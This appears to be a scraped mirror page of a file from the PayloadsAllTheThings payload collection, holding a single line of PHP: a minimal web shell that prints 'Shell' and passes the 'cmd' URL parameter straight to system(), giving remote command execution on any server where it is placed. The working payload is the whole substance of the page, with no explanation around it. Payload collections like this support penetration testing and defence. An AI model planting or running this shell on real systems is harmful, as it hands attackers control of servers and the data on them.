mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-02-01 07:57:25 +00:00
1 line
43 B
Plaintext
1 line
43 B
Plaintext
<?php echo "Shell";system($_GET['cmd']); ?> |